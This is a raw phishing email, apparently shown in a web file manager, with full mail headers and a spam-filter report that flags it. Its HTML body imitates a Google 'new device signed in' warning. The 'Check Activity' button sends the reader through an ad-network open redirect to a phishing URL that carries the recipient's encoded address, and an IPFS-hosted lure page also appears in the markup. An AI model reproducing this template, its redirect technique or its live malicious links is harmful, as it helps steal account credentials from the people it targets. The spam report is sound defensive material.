OwlCyberSecurity - MANAGER

Edit File: 1742834938.M781469P4165713.premium128.web-hosting.com,S=10641,W=10821:2,

Return-Path: <suporte@webluz.com.br> Delivered-To: contact+spam@gourayafroid.com Received: from premium128.web-hosting.com by premium128.web-hosting.com with LMTP id qOcpLfqM4WdRkD8AAvhI2g (envelope-from <suporte@webluz.com.br>) for <contact+spam@gourayafroid.com>; Mon, 24 Mar 2025 12:48:58 -0400 Return-path: <suporte@webluz.com.br> Envelope-to: contact@gourayafroid.com Delivery-date: Mon, 24 Mar 2025 12:48:58 -0400 Received: from mx02.vps001.webluz.com.br ([162.214.126.233]:46526) by premium128.web-hosting.com with esmtps (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.98.1) (envelope-from <suporte@webluz.com.br>) id 1twkyr-0000000HXra-1Ova for contact@gourayafroid.com; Mon, 24 Mar 2025 12:48:58 -0400 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=webluz.com.br; s=default; h=Content-Transfer-Encoding:Content-Type: MIME-Version:Message-ID:Date:Subject:To:From:Sender:Reply-To:Cc:Content-ID: Content-Description:Resent-Date:Resent-From:Resent-Sender:Resent-To:Resent-Cc :Resent-Message-ID:In-Reply-To:References:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=MxeedeEY6spJglKJoZu87XwQ1lG5BnE8VPNxZlQSosQ=; b=auHN2geVtKLeG6eAl5Se+CaS9k 3hwK8NxU0WNUvK0g3C4tL9pdGPQdAQUmhR5ciuKl3lW2DS5qgCtZZqo6PE1DAwrOtXpBXvuVtWT64 MINZll7hklWNCN2nnHZkr5tfXk+3MbAMT8cagdQ/+dcHgANOxkNEIuUumaRr13QQZJShcsShfAmZg 7alBUwnLQdn7D6H3mtYTiSGIw3b19BGPMhnxJMrDW9/XVhtgYPc+7clsOQ46CEtavFH7lUoFk/Qn8 aTYVzLrr14OPmfocjtQECc0lDtYl9JxkruIv9w5P4vos7FpIcdZUQRAAsNAcrof2uXctpjkmaTADy U67uzwFw==; Received: from [36.140.36.152] (port=57886 helo=webluz.com.br) by vps-4981252.vps001.webluz.com.br with esmtpsa (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (Exim 4.98.1) (envelope-from <suporte@webluz.com.br>) id 1twkyA-000000005S5-3lTA for contact@gourayafroid.com; Mon, 24 Mar 2025 13:48:11 -0300 From: gourayafroid.com <suporte@webluz.com.br> To: contact@gourayafroid.com Date: 25 Mar 2025 00:48:10 +0800 Message-ID: <20250325004810.96AEA5C1CECFECA3@webluz.com.br> MIME-Version: 1.0 Content-Type: text/html Content-Transfer-Encoding: quoted-printable X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - vps-4981252.vps001.webluz.com.br X-AntiAbuse: Original Domain - gourayafroid.com X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - webluz.com.br X-Get-Message-Sender-Via: vps-4981252.vps001.webluz.com.br: authenticated_id: suporte@webluz.com.br X-Authenticated-Sender: vps-4981252.vps001.webluz.com.br: suporte@webluz.com.br X-Source: X-Source-Args: X-Source-Dir: X-Spam-Status: Yes, score=7.7 X-Spam-Score: 77 X-Spam-Bar: +++++++ X-Spam-Report: Spam detection software, running on the system "premium128.web-hosting.com", has identified this incoming email as possible spam. The original message has been attached to this so you can view it or label similar future email. If you have any questions, see root\@localhost for details. Content preview: New device signed in to contact@gourayafroid.com Your Account was just signed in to a new Windows device. You're getting this email to make sure it was you. Check Activity You can also see security activity Content analysis details: (7.7 points, 5.0 required) pts rule name description ---- ---------------------- -------------------------------------------------- 0.0 URIBL_BLOCKED ADMINISTRATOR NOTICE: The query to URIBL was blocked. See http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block for more information. [URIs: ipfs.io] 2.5 URIBL_DBL_PHISH Contains a Phishing URL listed in the Spamhaus DBL blocklist [URIs: clinicadeolhosuchoa.com.br] 0.1 URIBL_SBL_A Contains URL's A record listed in the Spamhaus SBL blocklist [URIs: ipfs.io] 0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [162.214.126.233 listed in bl.score.senderscore.com] 0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to Validity was blocked. See https://knowledge.validity.com/hc/en-us/articles/20961730681243 for more information. [162.214.126.233 listed in sa-accredit.habeas.com] -0.0 SPF_PASS SPF: sender matches SPF record 0.0 HTML_MESSAGE BODY: HTML included in message 0.1 MIME_HTML_ONLY BODY: Message only has text/html MIME parts -0.1 DKIM_VALID_EF Message has a valid DKIM or DK signature from envelope-from domain -0.1 DKIM_VALID Message has at least one valid DKIM or DK signature 0.1 DKIM_SIGNED Message has a DKIM or DK signature, not necessarily valid -0.1 DKIM_VALID_AU Message has a valid DKIM or DK signature from author's domain 2.5 URI_IPFSIO References Interplanetary File System PtP content via ipfs.io, likely phishing 1.6 PDS_FROM_NAME_TO_DOMAIN From:name looks like To:domain 0.0 KAM_SHORT Use of a URL Shortener for very short URL 0.0 T_KAM_HTML_FONT_INVALID Test for Invalidly Named or Formatted Colors in HTML 0.0 URI_IPFS References Interplanetary File System PtP content, probable phishing 0.0 PDS_FRNOM_TODOM_DBL_URL From Name to domain, double URL 1.1 PDS_FRNOM_TODOM_NAKED_TO Naked to From name equals to Domain X-Spam-Flag: YES Subject: ***SPAM*** Important Notice - New Device Signed In <!DOCTYPE HTML> <html><head><title></title> <meta http-equiv=3D"X-UA-Compatible" content=3D"IE=3Dedge"> </head> <body style=3D"margin: 0.4em;"> <div align=3D"center" style=3D"padding: 40px 20px; border-radius: 8px; bord= er: thin solid rgb(218, 220, 224); color: rgb(34, 34, 34); text-transform: = none; text-indent: 0px; letter-spacing: normal; font-family: Arial, Helveti= ca, sans-serif; font-size: small; font-style: normal; font-weight: 400; wor= d-spacing: 0px; white-space: normal; box-sizing: border-box; orphans: 2; wi= dows: 2; background-color: rgb(255, 255, 255); font-variant-ligatures: norm= al; font-variant-caps: normal;=20 -webkit-text-stroke-width: 0px; text-decoration-thickness: initial; text-de= coration-style: initial; text-decoration-color: initial;"><div style=3D"lin= e-height: 32px; padding-bottom: 24px; border-bottom-color: rgb(218, 220, 22= 4); border-bottom-width: thin; border-bottom-style: solid; box-sizing: bord= er-box;"><div style=3D"box-sizing: border-box;"><span style=3D'font-family:= "Google Sans", Roboto, RobotoDraft, Helvetica, Arial, sans-serif; font-siz= e: 24px;'>New device signed in&nbsp;to<span> &nbsp;</span><b>contact@gourayafroid.com</b></span></div><br style=3D"box-s= izing: border-box;"></div><div style=3D"line-height: 20px; padding-top: 20p= x; font-family: Roboto-Regular, Helvetica, Arial, sans-serif; box-sizing: b= order-box;"><span style=3D"font-size: 14px; box-sizing: border-box;">Your A= ccount was just signed in to a new Windows device. You're getting this emai= l to make sure it was you.</span><div style=3D"padding-top: 32px; box-sizin= g: border-box;"> <a style=3D'padding: 10px 24px; border-radius: 5px; color: rgb(255, 255, 25= 5); line-height: 16px; font-family: "Google Sans", Roboto, RobotoDraft, Hel= vetica, Arial, sans-serif; display: inline-block; min-width: 90px; box-sizi= ng: border-box; background-color: rgb(65, 132, 243); text-decoration-line: = none;'=20 href=3D"https://ad.doubleclick.net/ddm/trackclk/N4892.5020.4774291382421/B2= 3999293.271539123;dc_trk_aid=3D466016770;dc_trk_cid=3D131101292;dc_lat=3D;d= c_rdid=3D;tag_for_child_directed_treatment=3D;tfua=3D?https://clinicadeolho= suchoa.com.br/pop/cgi-bin?email=3DY29udGFjdEBnb3VyYXlhZnJvaWQuY29t" target= =3D"_blank" rel=3D"noreferrer"=20 data-saferedirecturl=3D"https://www.google.com/url?q=3Dhttps://ipfs.io/ipfs= /QmeYTsM5YN8b5ySGxfZ3sRkGQb5jveGwX9bx4mAKAaWMa9?filename%3Dnorton.html%23za= vir@zavir.com&amp;source=3Dgmail&amp;ust=3D1742652684518000&amp;usg=3DAOvVa= w2RBykYvlKJSZGAzSTgbzIN"><font size=3D"4" style=3D"box-sizing: border-box;"= >Check Activity</font></a></div></div><div style=3D"color: rgb(95, 99, 104)= ; line-height: 16px; letter-spacing: 0px; padding-top: 20px; font-size: 12p= x; box-sizing: border-box;"> You can also see security activity<br style=3D"box-sizing: border-box;">&nb= sp;</div></div> <div style=3D"color: rgb(34, 34, 34); text-transform: none; text-indent: 0p= x; letter-spacing: normal; font-family: Arial, Helvetica, sans-serif; font-= size: small; font-style: normal; font-weight: 400; word-spacing: 0px; white= -space: normal; box-sizing: border-box; orphans: 2; widows: 2; background-c= olor: rgb(255, 255, 255); font-variant-ligatures: normal; font-variant-caps= : normal; -webkit-text-stroke-width: 0px; text-decoration-thickness: initia= l; text-decoration-style: initial;=20 text-decoration-color: initial;"><div style=3D"line-height: 18px; padding-t= op: 12px; font-family: Roboto-Regular, Helvetica, Arial, sans-serif; font-s= ize: 11px; box-sizing: border-box;"><div style=3D"box-sizing: border-box;">= You received this email to let you know about important changes to your<spa= n>&nbsp;</span><font color=3D"#1155cc">contact@gourayafroid.com</font>&nbsp= ;Account and services.</div><div style=3D"direction: ltr; box-sizing: borde= r-box;"> &copy; 2025&nbsp;<a style=3D"color: rgb(17, 85, 204); box-sizing: border-bo= x; background-color: transparent; text-decoration-line: none;" href=3D"http= ://link.net/" target=3D"_blank" rel=3D"noreferrer" data-saferedirecturl=3D"= https://www.google.com/url?q=3Dhttp://link.net/&amp;source=3Dgmail&amp;ust= =3D1742652684518000&amp;usg=3DAOvVaw26W9Zee0BfEcOxEJX8SpMD">link.net</a>&nb= sp;&nbsp;LLC,&nbsp;<a style=3D"color: inherit; line-height: 18px; padding-t= op: 12px; box-sizing: border-box; background-color: transparent;"> 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</a></div></div></di= v></body></html>